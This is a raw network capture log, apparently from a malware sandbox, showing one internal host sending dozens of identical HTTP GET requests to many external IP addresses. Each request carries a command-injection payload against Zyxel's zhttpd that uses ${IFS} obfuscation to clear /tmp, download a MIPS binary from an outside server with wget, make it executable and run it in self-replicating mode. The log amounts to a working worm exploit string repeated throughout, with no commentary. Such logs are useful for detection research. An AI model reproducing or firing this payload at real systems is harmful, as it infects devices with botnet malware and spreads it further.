                                                      Feb 2, 2024 06:35:51.606327057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4113192.168.2.1456048209.47.111.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606389999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4114192.168.2.1433744212.234.74.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606410027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4115192.168.2.145978470.210.179.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606455088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4116192.168.2.1453882204.109.34.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606503963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4117192.168.2.144207649.197.209.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606525898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4118192.168.2.143899836.150.107.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606570005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4119192.168.2.1434080164.49.5.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606617928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4120192.168.2.1451390193.188.231.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606657982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4121192.168.2.1447638144.142.227.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606683969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4122192.168.2.146014657.243.176.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606738091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4123192.168.2.1439988206.118.43.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606792927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4124192.168.2.14464685.70.210.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606842995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4125192.168.2.143511614.199.249.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606892109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4126192.168.2.1437686109.246.235.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606934071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4127192.168.2.143996634.30.218.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.606972933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4128192.168.2.1456210115.76.224.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607009888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4129192.168.2.1432812110.30.65.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607048988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4130192.168.2.145496884.117.0.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607100010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4131192.168.2.1438864211.191.19.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607132912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4132192.168.2.145296446.245.80.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607177973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4133192.168.2.1444192119.88.214.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607208967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4134192.168.2.144020851.24.156.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607244015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4135192.168.2.1448622157.248.203.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607266903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4136192.168.2.1434366144.200.129.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607312918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4137192.168.2.1444258126.182.187.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607352972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4138192.168.2.1455010143.83.216.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607382059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4139192.168.2.1434676187.208.48.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607440948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4140192.168.2.1449262189.59.63.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607479095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4141192.168.2.1438736132.11.172.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607525110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4142192.168.2.1455058104.167.53.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607553959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4143192.168.2.144059219.201.92.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607595921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4144192.168.2.1447040169.125.24.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607639074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4145192.168.2.14413985.45.230.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607676983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4146192.168.2.1445258188.130.194.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607726097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4147192.168.2.1459764188.159.218.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607764006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4148192.168.2.1443912168.120.159.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607835054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4149192.168.2.1440594101.121.76.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607856989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4150192.168.2.1448440151.237.251.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607897043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4151192.168.2.1451458190.255.43.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607945919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4152192.168.2.144968091.145.195.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.607981920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4153192.168.2.145732885.141.29.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.608032942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4154192.168.2.1452472101.79.51.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.608064890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4155192.168.2.1448020136.88.170.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.608088017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4156192.168.2.1457590184.11.106.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.608140945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4157192.168.2.1451912174.181.205.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.608172894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4158192.168.2.144345253.96.140.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.608223915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4159192.168.2.145450627.75.163.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.608258009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4160192.168.2.1451162201.108.111.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.608285904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4161192.168.2.144646061.232.85.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.611752033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4162192.168.2.1450178190.77.56.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:51.611789942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4163192.168.2.1459854145.191.61.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606036901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4164192.168.2.1451468138.83.19.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606164932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4165192.168.2.1450618177.130.162.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606197119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4166192.168.2.145209476.154.14.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606232882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4167192.168.2.1444052136.233.88.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606271029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4168192.168.2.143423860.147.123.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606314898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4169192.168.2.144672294.215.162.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606345892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4170192.168.2.144206098.86.163.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606389999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4171192.168.2.146062485.38.18.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606434107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4172192.168.2.1455406167.17.99.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606479883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4173192.168.2.144738672.126.105.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606509924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4174192.168.2.145126036.207.175.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:52.606550932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4175192.168.2.1437096146.95.30.148443
                                                      TimestampBytes transferredDirectionData
